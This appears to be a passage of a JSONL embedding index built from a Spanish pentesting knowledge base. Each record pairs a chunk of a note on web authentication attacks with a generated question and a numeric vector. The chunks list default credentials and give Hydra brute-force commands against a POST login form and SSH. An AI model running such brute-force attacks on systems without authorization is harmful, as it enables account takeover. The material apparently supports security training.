-0.01094, 0.04484, -0.06147, 0.00933, 0.04313, 0.00913, -0.04326, 0.00997, 0.05868, -0.00765, -0.03372, -0.03614, 0.03044, -0.03263, 0.02078, 0.07023, 0.04414, -0.06665, -0.00535, -0.00985, 0.00052, 0.0026, 0.01093, -0.0766, -0.00386, -0.03686, -0.00214, 0.01779, -0.01975, 0.03054, -0.02913, 0.02641, -0.00681, 0.00202, 0.00541, 0.03433, 0.01996, -0.08045, 0.02098, 0.02864, 0.01466, -0.07858, -0.01565, 0.02038, -0.02176, -0.06823, 0.02254, 0.00907, -0.09595, 0.00711, -0.04511, 0.07038, -0.01907, -0.03658, -0.04081, -0.0146, 0.00126, -0.04735, -0.04471, -0.02642, -0.0256, 0.00311, 0.0482, -0.01284, 0.0103, -0.0109]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "con que puedo hacer un ataque de credenciales por defecto?", "v": [-0.0871, 0.07693, -0.1924, 0.05419, 0.01352, 0.08577, 0.07247, 0.15613, -0.05687, -0.01119, 0.02269, 0.02044, -0.21078, -0.11812, 0.04284, 0.00674, 0.02181, 0.08021, 0.1111, -0.11689, 0.01918, -0.1365, 0.0097, -0.00629, 0.01727, 0.06548, -0.05719, 0.19087, -0.00198, -0.13682, -0.0732, -0.09303, 0.01909, 0.02625, 0.07201, 0.0353, -0.10756, 0.09233, 0.08361, 0.1988, -0.02436, -0.01951, -0.10745, -0.03921, 0.1054, -0.02176, -0.01207, 0.04947, -0.04449, -0.01002, 0.05775, -0.05088, -0.15965, -0.1303, -0.03276, 0.04241, 0.07007, -0.10446, 0.0356, -0.08797, -0.09934, 0.04614, 0.04061, -0.0312, 0.00501, -0.01515, -0.10574, -0.07528, -0.07449, 0.04568, -0.03545, -0.06264, 0.02028, 0.01454, -0.01421, -0.0357, 0.04866, 0.05244, 0.01891, 0.00282, -0.00101, -0.00473, -0.042, -0.04665, -0.0505, -0.01266, 0.00613, -0.03103, -0.08183, -0.01074, 0.05083, 0.05318, -0.0007, -0.04678, -0.11169, -0.00777, -0.02054, -0.07041, -0.01989, -0.025, -0.01218, -0.07612, -0.02707, 0.12971, 0.01921, 0.02296, -0.00575, 0.02196, 0.01009, -0.10745, -0.0144, -0.02836, -0.08282, -0.08303, 0.02279, 0.01114, -0.14876, 0.00524, 0.03693, 0.0804, -0.05713, -0.08719, -0.00416, 0.00125, -0.03743, 0.01868, -0.07968, 0.0067, -0.09963, 0.02996, -0.03144, -0.0071, 0.07789, -0.04174, 0.02415, 0.03099, 0.02701, -0.12792, -0.04958, 0.06592, 0.04811, 0.05149, 0.029, 0.01212, -0.03524, 0.02956, -0.0732, -0.08878, -0.098, -0.05142, 0.04786, 0.11899, 0.02976, 0.0568, -0.07349, -0.02681, 0.07187, -0.00681, 0.02647, 0.12695, -0.04708, 0.04706, -0.01628, 0.09612, -0.03987, -0.06971, 0.01006, -0.05074, 0.06166, 0.01497, -0.03896, 0.04976, -0.03122, -0.04438, 0.03095, -0.02878, -0.05258, -0.04055, 0.00825, -0.00357, 0.05515, -0.06123, -0.07616, 0.04396, 0.02762, 0.03023, 0.02496, 0.04663, 0.01584, 0.02705, -0.02883, -0.025, 0.06051, 0.07399, 0.04712, -0.00524, 0.03127, 0.03712, -0.03856, 0.01637, -0.00492, -0.03655, -0.01277, -0.02671, 0.07052, 0.05752, -0.03208, 0.01684, 0.0051, 0.08173, 0.05492, -0.02828, 0.109, -0.10319, -0.11823, 0.06893, 0.01374, 0.02225, -0.01271, -0.03057, 0.08846, -0.03896, 0.01217, 0.07363, 0.01255, -0.0712, -0.04073, -0.07489, 0.02616, 0.05223, -0.00717, -0.04818, 0.0287, -0.08403, 0.02014, -0.0381, 0.01807, 0.03495, -0.07255, 0.00918, -0.0493, -0.03465, 0.01723, -0.01995, -0.00336, -0.0225, -0.04327, 0.03287, -0.00614, -0.03816, -0.03662, 0.00755, 0.04858, -0.01831, 0.08854, 0.0087]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "indexar": "cual es una alternativa libre para pruebas de bypass de login?", "v": [-0.02058, 0.07769, -0.17112, -0.08561, -0.09224, -0.03464, -0.09775, -0.03225, -0.12674, -0.05189, -0.03916, -0.12107, -0.05229, 0.08787, 0.023, -0.09313, -0.00698, -0.03926, 0.06282, -0.09875, -0.09522, -0.02106, -0.10679, -0.03855, 0.05565, 0.04922, -0.03662, 0.00798, -0.06229, -0.06746, -0.04847, -0.01776, 0.07945, 0.03041, -0.03275, 0.09907, 0.14706, 0.13413, 0.14014, 0.06868, 0.03876, -0.13267, 0.02166, 0.12198, 0.01862, -0.12747, 0.00397, 0.09744, -0.02655, -0.0096, -0.03564, -0.04096, -0.02417, 0.04138, 0.06133, -0.05915, 0.0336, -0.12017, -0.05724, 0.00633, -0.12204, -0.00538, 0.05011, -0.00356, 0.04037, -0.05926, -0.03462, 0.02635, -0.09891, 0.15059, 0.07009, -0.02333, 0.01803, -0.04015, -0.21798, -0.00889, -0.03008, 0.00038, 0.04626, 0.06426, 0.10416, -0.07661, -0.01383, 0.0412, -0.08981, -0.02307, 0.00395, -0.02911, 0.06459, 0.09839, 0.09189, 0.01054, 0.07949, 0.11675, 0.01643, -0.04336, 0.02933, 0.02532, -0.00288, -0.08413, 0.09239, 0.06513, -0.07847, 0.05056, -0.05002, -0.07295, -0.02768, 0.0477, -0.06752, 0.00111, 0.0054, 0.0235, -0.05661, 0.00273, 0.00646, 0.01945, -0.01853, -0.0074, -0.05509, 0.04889, -0.05039, -0.00101, -0.11341, -0.10077, 0.0269, 0.03266, 0.13573, 0.01915, -0.04069, 0.14639, 0.09919, 0.06667, -0.07068, -0.05729, -0.09161, -0.03573, 0.07011, -0.06649, -0.00402, 0.03546, 0.01406, 0.01292, 0.05388, -0.00721, 0.03787, 0.02723, -0.06225, 0.01768, -0.04496, -0.07165, -0.10025, -0.04004, -0.02705, 0.14186, -0.08457, -0.01865, 0.01649, 0.01893, -0.01618, 0.08913, -0.04709, 0.00301, -0.07223, -0.01789, -0.02194, 0.00655, 0.01639, -0.08609, -0.08712, -0.02646, 0.04924, 0.0526, 0.06272, -0.06229, 0.13195, -0.00112, 0.01702, -0.11549, -0.00966, -0.04357, 0.04886, 0.03783, -0.07854, -0.03271, 0.06362, -0.04345, 0.04983, 0.02635, 0.11024, 0.07106, -0.02474, 0.04971, -0.02725, -0.01104, -0.00101, 0.06122, 0.03682, -0.0603, -0.04878, -0.05797, -0.02579, -0.04901, -0.02792, -0.04346, -0.04956, -0.01535, -0.00432, 0.00209, 0.02129, 0.00519, 0.08496, 0.01588, 0.08682, -0.04019, -0.04889, 0.04435, 0.04129, 0.00334, -0.04165, -0.00595, 0.03562, 0.02426, 0.01072, 0.06326, -0.04995, 0.0715, -0.03618, 0.01899, -0.01219, -0.02131, 0.03718, 0.00372, 0.01954, 0.08798, 0.0259, -0.02182, -0.02236, 0.05651, 0.00693, -0.04501, 0.02717, 0.07861, -0.03504, -0.01067, -0.06554, 0.04117, -0.04124, -0.07052, -0.03293, -0.02529, -0.02931, 0.00471, -0.04306, 0.02124, 0.0898, 0.02866]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (bΓΊscalas: `searchsploit ` o Google).\n- **ReutilizaciΓ³n**: cualquier credencial que pillaste antes (MetodologΓ­a OSCP).", "indexar": "que programa hay para buscar credenciales por defecto de un sistema?", "v": [-0.03072, 0.00908, -0.13097, -0.08803, 0.09618, -0.07186, 0.03324, -0.01482, -0.08727, -0.10635, -0.0722, 0.03297, -0.1779, -0.18668, 0.07107, 0.00856, 0.01078, -0.07737, 0.07133, -0.04407, -0.03676, -0.08788, -0.02672, -0.0537, -0.06021, 0.05682, -0.06733, -0.07473, -0.01626, 0.00828, -0.00015, -0.05803, 0.04845, -0.07444, -0.06763, 0.06084, 0.02732, -0.01206, -0.00094, 0.07646, 0.06438, 0.00018, 0.04726, 0.01981, 0.0703, -0.07199, 0.04616, 0.02746, -0.08572, -0.11342, -0.05978, -0.03122, -0.07909, -0.05102, 0.1283, -0.08512, -0.03621, -0.06276, -0.03276, -0.10559, -0.08101, 0.02378, 0.06295, -0.04075, 0.02484, 0.01606, 0.04354, -0.11647, -0.1177, 0.07442, -0.02244, -0.10806, 0.10527, 0.01884, -0.03199, 0.02931, 0.06069, -0.03731, 0.07179, -0.07166, -0.02366, 0.00295, -0.01895, 0.11111, -0.0358, -0.02757, 0.08221, 0.06095, -0.06679, 0.02867, 0.01622, 0.07108, 0.04006, 0.13591, 0.05214, -0.03992, 0.08707, 0.02167, -0.01981, 0.07199, -0.01505, -0.11601, -0.05798, 0.16539, -0.12457, 0.04032, 0.11484, 0.04196, -0.00952, 0.01766, -0.00438, -0.01716, 0.04625, -0.0379, -0.0531, 0.02284, -0.04172, -0.00885, 0.04255, -0.01649, -0.05224, 0.0509, -0.06365, -0.07724, 0.14924, 0.01243, -0.05693, 0.10309, -0.00046, 0.09678, 0.04266, -0.03854, -0.05502, -0.00964, -0.02542, -0.07906, 0.03182, 0.0182, 0.00298, 0.00874, -0.00204, 0.04892, 0.04097, -0.05773, 0.04978, 0.02119, 0.04208, -0.0887, 0.00242, -0.08177, -0.04191, 0.1319, 0.00462, -0.02532, -0.09694, -0.03089, 0.09965, -0.0367, -0.04131, 0.00351, -0.04611, -0.01389, 0.01192, -0.02079, 0.0228, -0.04507, 0.02739, -0.00788, 0.07111, 0.02353, -0.02603, 0.07315, 0.0213, -0.09585, -0.01098, 0.02882, -0.00237, -0.14035, 0.02211, 0.00398, -0.06566, 0.03993, 0.08434, 0.02729, -0.00575, 0.01977, -0.07028, 0.07688, -0.00277, -0.03872, 0.08513, -0.04351, 0.01066, 0.04907, 0.0143, 0.06741, 0.02083, -0.02215, 0.02523, -0.0269, -0.11412, 0.03263, 0.0383, -0.03746, 0.02178, 0.07314, 0.06191, -0.0062, 0.09999, 0.15119, 0.05357, -0.03198, 0.04717, -0.03017, -0.10293, 0.03077, -0.03008, 0.0811, 0.04451, -0.00623, 0.03476, -0.05197, 0.00667, 0.14648, -0.04667, -0.12987, -0.00407, 0.05433, 0.00665, -0.01499, 0.00481, -0.11241, 0.00718, -0.06341, 0.01405, -0.05867, -0.00857, 0.02152, -0.0042, -0.1051, -0.02559, 0.078, 0.02248, -0.04964, -0.03366, -0.00292, -0.0475, -0.01194, 0.04889, -0.0225, -0.07776, 0.0297, 0.01772, -0.09524, 0.08071, 0.00354]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (bΓΊscalas: `searchsploit ` o Google).\n- **ReutilizaciΓ³n**: cualquier credencial que pillaste antes (MetodologΓ­a OSCP).", "indexar": "con que puedo encontrar credenciales reutilizadas de productos anteriores?", "v": [-0.14546, -0.07801, -0.20501, 0.05322, 0.26041, -0.01354, 0.05326, 0.03661, -0.14926, -0.21497, -0.12634, -0.0364, 0.02967, -0.06619, 0.12241, 0.03531, -0.13731, -0.03032, 0.12309, -0.04544, 0.06371, -0.15725, -0.17501, -0.0228, -0.0752, 0.03022, 0.08406, -0.02789, 0.00253, 0.06665, 0.06057, 0.02894, -0.07189, -0.03126, -0.11857, 0.01545, -0.03508, 0.04619, -0.05477, 0.08794, 0.01511, -0.02609, -0.02475, -0.05268, 0.07779, 0.02345, -0.05913, 0.08859, -0.17309, 0.01767, -0.01065, -0.12322, -0.11318, -0.06991, 0.06613, -0.08213, 0.03579, 0.08483, 0.02359, -0.1445, 0.02947, 0.0708, 0.13921, 0.01983, -0.04118, -0.02626, -0.02515, -0.07312, 0.02065, -0.0044, -0.07381, -0.04138, -0.0908, -0.14815, 0.00932, -0.04783, 0.01162, 0.06274, 0.07886, 0.01753, 0.05992, 0.05909, 0.10132, -0.03882, 0.08712, -0.06497, -0.04293, -0.03008, -0.03207, -0.06701, 0.02385, -0.03099, -0.01073, -0.01742, 0.0017, 0.03252, -0.00784, -0.05769, -0.09045, 0.04627, -0.09178, 0.02446, 0.02282, 0.05113, 0.00272, -0.03765, 0.03229, 0.04927, -0.02815, 0.00547, -0.03766, -0.02962, -0.0445, -0.10334, 0.04727, 0.15066, -0.03654, -0.04205, 0.03868, 0.01287, 0.02894, -0.04744, -0.01215, 0.00695, 0.06346, 0.07269, 0.00043, 0.02943, 0.01385, -0.05354, 0.00383, 0.08901, 0.01306, -0.0486, 0.05858, -0.03946, 0.03157, -0.00599, 0.00519, -0.00098, 0.12295, -0.02179, 0.03336, 0.01276, -0.00033, -0.02697, -0.04918, -0.01657, 0.041, -0.02364, 0.04092, 0.13936, 0.09501, 0.01856, 0.0226, 0.08436, 0.02945, -0.03099, 0.07606, 0.0085, -0.08775, 0.03344, -0.00992, 0.06208, 0.00565, -0.0445, -0.07804, -0.03565, 0.00927, 0.01855, -0.06472, 0.0574, -0.02808, -0.06051, -0.00224, 0.0008, -0.02012, -0.02963, -0.00327, -0.11504, 0.01914, 0.02075, -0.06458, 0.00366, 0.07697, -0.06796, 0.0052, 0.01576, 0.00063, -0.0303, -0.01198, -0.01741, -0.00669, -0.02273, 0.01409, -0.05696, 0.04204, 0.00837, -0.04223, -0.061, -0.05631, 0.03444, -0.03609, -0.0768, 0.0324, 0.01424, -0.01947, 0.05587, -0.02655, -0.0162, -0.0335, -0.06022, 0.06478, -0.02988, -0.07961, -0.05897, -0.00097, -0.05696, -0.0513, 0.056, 0.01658, 0.02534, 0.01223, 0.05129, -0.02384, -0.08737, -0.00802, 0.01223, -0.0006, 0.04344, -0.00272, 0.01292, -0.01928, -0.04745, -0.01736, -0.01188, 0.01548, 0.00721, -0.01556, -0.02055, 0.05414, 0.01696, 0.00273, -0.0194, -0.08821, 0.01396, -0.04801, -0.0219, -0.00423, -0.01339, -0.01102, 0.00621, 0.02567, -0.06827, 0.03216, 0.0022]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (bΓΊscalas: `searchsploit ` o Google).\n- **ReutilizaciΓ³n**: cualquier credencial que pillaste antes (MetodologΓ­a OSCP).", "indexar": "cual es una herramienta para hacer busquedas en bases de datos de exploits?", "v": [0.0076, 0.01532, -0.09556, -0.14444, 0.0442, -0.1396, -0.03594, 0.03629, -0.08174, -0.03805, -0.0595, -0.12982, -0.12747, -0.00169, -0.03218, -0.06233, 0.10336, -0.05346, 0.00941, -0.08026, -0.01246, -0.0052, -0.06272, 0.02154, -0.19601, -0.01667, 0.00896, -0.02679, -0.2161, 0.11246, -0.05758, 0.0496, -0.0565, -0.00269, -0.04566, -0.0317, -0.01352, 0.00405, 0.02055, -0.02093, -0.0822, -0.0158, -0.17159, 0.02501, 0.10443, -0.03845, -0.09593, 0.04974, 0.03037, -0.02926, 0.01788, -0.10554, -0.19175, -0.08758, 0.02515, -0.22082, 0.18425, -0.11249, -0.02191, -0.00028, -0.15152, -0.07604, 0.03311, -0.03046, -0.01433, -0.09139, 0.11395, -0.00067, -0.05134, 0.16148, 0.05688, 0.0878, 0.00601, -0.01789, -0.01921, -0.08181, 0.12117, 0.04202, -0.03429, 0.04679, -0.0446, -0.00984, -0.12853, 0.06026, -0.10759, -0.05799, 0.12683, 0.0505, -0.03518, -0.09227, 0.02556, 0.03644, -0.08125, 0.03329, 0.02411, -0.02218, 0.08489, -0.05751, -0.02257, 0.06386, 0.02587, -0.10991, -0.09243, 0.04152, 0.02046, 0.01474, -0.02975, 0.05352, -0.1071, -0.03335, 0.02253, -0.03101, -0.01355, 0.03991, 0.04178, 0.03167, 0.00302, -0.08276, 0.00721, -0.06594, 0.02581, 0.02627, -0.07028, -0.02948, 0.04088, -0.0283, -0.06943, 0.04491, 0.04522, -0.03297, 0.02137, -0.04099, -0.06269, 0.03112, 0.06519, -0.02542, 0.01374, -0.09799, -0.01215, -0.09741, 0.01837, 0.04739, -0.03762, -0.07676, 0.04891, 0.00793, 0.06842, 0.0767, -0.03859, -0.06326, -0.02475, -0.04719, 0.00318, 0.07518, -0.04053, -0.0045, 0.00039, -0.01506, -0.08818, 0.03344, 0.04162, 0.00017, -0.01336, -0.03006, 0.02742, -0.08163, 0.06844, 0.01158, -0.00344, 0.04159, -0.00581, 0.04132, 0.07888, -0.05272, 0.09852, -0.03493, -0.08983, -0.02637, -0.05896, -0.04849, 0.02386, -0.03561, 0.03459, 0.00043, 0.06876, -0.05622, 0.07499, -0.0663, 0.00112, -0.04141, 0.0419, 0.02201, 0.04699, -0.00818, 0.05406, -0.01733, -0.01397, 0.03977, 0.05116, -0.05257, -0.02898, 0.01435, -0.03922, -0.00522, 0.02452, 0.02074, 0.00088, -0.11313, -0.0112, -0.0519, 0.01292, 0.0367, -0.0156, -0.05253, -0.08282, -0.04328, -0.01806, 0.02964, -0.00946, -0.02853, -0.03453, 0.03682, 0.05529, -0.00064, -0.05423, 0.05554, 0.01349, -0.04012, -0.04346, -0.05848, 0.05027, -0.04648, 0.04609, 0.0028, 0.00491, -0.05146, -0.00383, -0.02982, 0.00096, -0.02149, -0.0294, 0.0461, -0.00323, -0.00595, -0.02055, 0.01267, -0.01375, 0.01455, -0.02111, -0.09363, -0.00479, -0.06596, 0.02684, -0.03037, 0.03502, -0.04765]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "que herramienta sirve para realizar ataques de fuerza bruta a formularios POST?", "v": [0.08494, 0.0164, -0.23074, -0.19025, 0.04217, -0.0654, 0.09105, -0.07687, 0.01774, -0.08408, 0.00956, -0.03231, 0.02515, 0.0288, 0.09765, -0.05641, 0.03771, -0.11569, -0.03692, -0.02185, -0.00597, -0.027, -0.00572, -0.06972, -0.1369, -0.03658, 0.00986, 0.0078, -0.15391, -0.00817, 0.13245, 0.07313, 0.08729, -0.06636, 0.04025, -0.02717, -0.09153, 0.04079, 0.02416, 0.05735, -0.02461, 0.09397, -0.1393, -0.05677, -0.06098, 0.04318, -0.06307, 0.03304, 0.00396, 0.04549, -0.00995, -0.09857, -0.17412, -0.0297, -0.11546, -0.13012, 0.1596, -0.20361, -0.06397, -0.0059, -0.10026, 0.03726, -0.00755, -0.02397, 0.0289, -0.02584, 0.04451, -0.06943, -0.09086, 0.01301, -0.07121, -0.05791, -0.03145, -0.04488, -0.09146, -0.03108, 0.00698, 0.05709, -0.00992, 0.03836, -0.0197, 0.00953, -0.19823, 0.00784, -0.0895, -0.04411, 0.07088, -0.03707, -0.11522, -0.11456, 0.0597, -0.02557, -0.07263, -0.0408, -0.0433, 0.01125, -0.06706, -0.02316, 0.03869, -0.06015, 0.02527, -0.07023, -0.04473, -0.01012, 0.02879, -0.04168, -0.07855, 0.00835, -0.02852, -0.04968, 0.01173, -0.05227, -0.03684, 0.01118, 0.01773, 0.07129, -0.08548, -0.08002, 0.01235, -0.07939, -0.04716, 0.06811, -0.08546, 0.0569, -0.00669, 0.03389, 0.0004, 0.01609, -0.00105, -0.11387, 0.01149, -0.01707, 0.01965, 0.06776, 0.0433, -0.00611, 0.03669, -0.13, 0.0124, -0.10965, 0.06393, 0.09734, 0.01099, -0.13494, 0.03301, 0.02501, 0.00261, -0.03741, -0.11455, -0.0523, 0.10185, -0.05391, 0.0183, 0.0801, -0.07192, -0.04034, 0.00826, -0.06388, -0.10222, 0.06915, -0.05574, -0.04186, -0.06648, 0.03204, -0.0222, 0.00819, -0.06757, 0.00355, 0.06927, 0.02827, 0.02837, 0.01069, 0.08309, -0.03039, 0.03184, -0.02214, -0.07071, 0.0657, -0.00404, -0.0378, -0.038, -0.0169, -0.06088, 0.0116, -0.00684, -0.00656, 0.07574, -0.06944, 0.0416, -0.02168, -0.01663, 0.04082, -0.03413, 0.00933, -0.00441, -0.0295, -0.07943, -0.02331, 0.06276, -0.00467, 0.0033, -0.06389, -0.04709, -0.03925, 0.03344, 0.0979, -0.01036, -0.04752, 0.01319, 0.01707, 0.01081, -0.03769, 0.05329, -0.06955, -0.03663, -0.04007, 0.04197, 0.00495, 0.00772, -0.00027, -0.00035, 0.03367, 0.01374, -0.00865, -0.00989, 0.07173, 0.04223, -0.06505, 0.02211, 0.02733, 0.02092, -0.03654, -0.03246, -0.04319, 0.01843, -0.00786, 0.05453, -0.03694, -0.10769, -0.01839, 0.00516, 0.03064, -0.00221, -0.06076, -0.05644, -0.04445, -0.06506, -0.02477, -0.01528, -0.03172, -0.03719, 0.05095, 0.07846, 0.00298, 0.00218, -0.08229]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "cual es una alternativa libre a hydra para probar credenciales?", "v": [-0.09769, -0.04732, -0.18814, 0.07136, 0.11404, 0.00749, -0.01117, 0.022, -0.15037, -0.12792, -0.05309, -0.07382, 0.0293, -0.03171, 0.09281, -0.03093, 0.0619, -0.06128, 0.07829, -0.02721, -0.07834, -0.00441, -0.20348, -0.11482, -0.10272, -0.16354, -0.03319, 0.08619, -0.0229, -0.06027, 0.02104, 0.00179, 0.08256, 0.11242, -0.11484, 0.13288, -0.00478, 0.07735, 0.12713, -0.03561, -0.03028, -0.00406, 0.16408, -0.00937, 0.00077, 0.01265, -0.11735, 0.05028, -0.15881, 0.01835, -0.07856, -0.0729, -0.13156, -0.02137, 0.07308, -0.02433, 0.00256, -0.08158, -0.0321, -0.06828, -0.02687, 0.02738, 0.10715, -0.00815, -0.03013, -0.01854, -0.09826, -0.06832, -0.12637, 0.07946, 0.02077, -0.05034, -0.00464, -0.00991, -0.14666, -0.00912, -0.04553, -0.04421, 0.0509, 0.02188, 0.07998, -0.10686, 0.02307, 0.03672, -0.02644, -0.12493, 0.03974, -0.12406, 0.05727, 0.09646, 0.12144, 0.03038, 0.00453, 0.18816, -0.03664, -0.06599, 0.05001, 0.04284, 0.01242, 0.02427, 0.04807, -0.01131, -0.07657, 0.05552, -0.06607, 0.0433, -0.04224, 0.05812, -0.07588, -0.02157, -0.00052, 0.03383, -0.10632, 0.07359, 0.05967, -0.03897, -0.06702, 0.0023, -0.03651, 0.01127, 0.02014, -0.07622, -0.03672, -0.06239, 0.02878, 0.0805, 0.0135, 0.00242, -0.04732, 0.06014, 0.03847, 0.05529, -0.02613, -0.06037, -0.02977, -0.02986, 0.05671, -0.0323, -0.04321, 0.03067, -0.02924, 0.03253, -0.00099, -0.07009, 0.0128, -0.01066, -0.01371, -0.02716, 0.01164, -0.03332, -0.05561, 0.04027, -0.00337, 0.13749, -0.09148, -0.01894, 0.04931, -0.03189, -0.02258, 0.09207, -0.0105, -0.0285, 0.05275, 0.04999, -0.01837, -0.01252, -0.05443, -0.08625, -0.06345, 0.02842, 0.05255, 0.06811, -0.00775, -0.06295, 0.10594, -0.03271, 0.0078, -0.09362, 0.00355, -0.06929, 0.04536, 0.02414, -0.09592, -0.02696, -0.02849, -0.06954, -0.02291, 0.0275, 0.01128, 0.04944, -0.00301, 0.00313, -0.07487, -0.05563, -0.00533, 0.0303, 0.05295, -0.09518, -0.03803, -0.03412, -0.06581, -0.03465, -0.02394, -0.05103, -0.00026, -0.01071, -0.00653, 0.05812, -0.00438, 0.07574, 0.06241, -0.01585, 0.09328, -0.03343, -0.07874, 0.00364, 0.01624, -0.02147, -0.02555, -0.00155, 0.03554, 0.02722, 0.02219, 0.0564, -0.03863, 0.00464, 0.01971, 0.03065, -0.04949, 0.01599, 0.03934, 0.01423, -0.03261, -0.00418, 0.01711, 0.01294, 0.0381, 0.04096, -0.03531, -0.06244, 0.03335, 0.0479, -0.03376, -0.03646, -0.06537, 0.004, -0.07904, -0.00672, -0.02689, -0.03276, -0.01247, 0.03329, 0.02677, -0.01312, 0.07444, 0.01218]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "indexar": "con que puedo montar un ataque con autenticaciΓ³n HTTP customizada?", "v": [0.00802, 0.06395, -0.24301, -0.04119, -0.06451, -0.00711, 0.00887, 0.07963, -0.08665, 0.08908, -0.11943, 0.00289, 0.02374, 0.01613, 0.06685, 0.00787, 0.09464, -0.09215, 0.10371, 0.00724, 0.05012, -0.10006, -0.00796, -0.07631, -0.03538, -0.05965, 0.04464, 0.16386, -0.1352, -0.11801, 0.07936, 0.0016, -0.08501, 0.19569, -0.01564, -0.08088, -0.05491, 0.08305, 0.00942, 0.03797, 0.01577, -7e-05, -0.04689, 0.04415, 0.00964, 0.07401, 0.02234, -0.04581, 0.04737, -0.06427, 0.07907, 0.05119, -0.25546, 0.03032, -0.09712, 0.06551, 0.16755, -0.09486, 0.06352, -0.01494, -0.04623, 0.03481, -0.01148, 0.04072, 0.08806, -0.03838, -0.06343, 0.00655, -0.09127, 0.02647, -0.00407, -0.01938, -0.0305, -0.01649, 0.09552, 0.06104, -0.03921, 0.02472, 0.06602, 0.07809, 0.03573, -0.02672, -0.01862, 0.03578, -0.09262, 0.00087, -0.04609, -0.11412, 0.05011, 0.00152, 0.12274, 0.04047, -0.04033, -0.06916, -0.12643, -0.09747, 0.047, -0.0687, -0.0105, -0.02703, -0.04258, 0.00545, -0.03604, 0.12671, 0.14933, 0.06477, 0.02804, -0.01953, 0.07889, -0.11635, -0.012, -0.03783, -0.1397, 0.00902, 0.02936, -0.08909, -0.05857, 0.04179, 0.01161, -0.05663, -0.1158, -0.04933, 0.00527, 0.02528, -0.02712, 0.03181, -0.03842, 0.06157, -0.07862, -0.02193, -0.02715, -0.04166, 0.01214, 0.01798, -0.05339, 0.08489, 0.04432, -0.15098, -0.03035, 0.0723, -0.00878, 0.00192, 0.00721, -0.00576, 0.05176, 0.0454, -0.03036, -0.07868, -0.09596, 0.03502, 0.04593, 0.07223, 0.01968, 0.04616, -0.10771, -0.03038, 0.00238, -0.04305, 0.00321, 0.15415, 0.01724, 0.02937, -0.00586, 0.03219, -0.01917, 0.06487, -0.08605, 0.01016, 0.10831, -0.01329, 0.0158, 0.0728, 0.00441, -0.08587, 0.01964, 0.0137, -0.07216, -0.04565, 0.06382, -0.00549, 0.00581, -0.05954, 0.00517, 0.00491, -0.02374, -0.04126, 0.06313, 0.02699, -0.00794, 0.0451, -0.02301, 0.00711, -0.04783, 0.09218, 0.0797, 0.01433, -0.0306, 0.03611, 0.01082, 0.05553, -0.03172, -0.05119, 0.0288, -0.03994, 0.02006, 0.03334, -0.02726, -0.00823, -0.03085, 0.02057, -0.00266, -0.03997, 0.05301, -0.07831, -0.04648, 0.03219, 0.06288, -0.00728, -0.03557, 0.04278, 0.01577, 0.02017, 0.0768, 0.03824, 0.04412, -0.02216, 0.03138, -0.07374, 0.00334, -0.0057, -0.03322, -0.02357, -0.02939, -0.01756, 0.06512, 0.01902, 0.04319, 0.04257, -0.08682, -0.01386, 0.02334, 0.01527, -0.01942, -0.03343, 0.01262, -0.0432, -0.07067, 0.01057, -0.00556, -0.04237, -0.03495, -0.00242, 0.00031, -0.03419, 0.01286, -0.00588]} +{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "quΓ© herramienta sirve para lanzar ataques de fuerza bruta SSH?", "v": [-0.0219, -0.06887, -0.29694, -0.10839, -0.0556, -0.06362, -0.02488, -0.10921, 0.0624, 0.05698, -0.086, 0.01254, 0.01244, -0.00557, 0.04489, 0.01397, -0.01909, -0.08916, -0.1138, -0.01918, 0.01878, -0.04958, 0.0227, -0.10417, -0.12799, 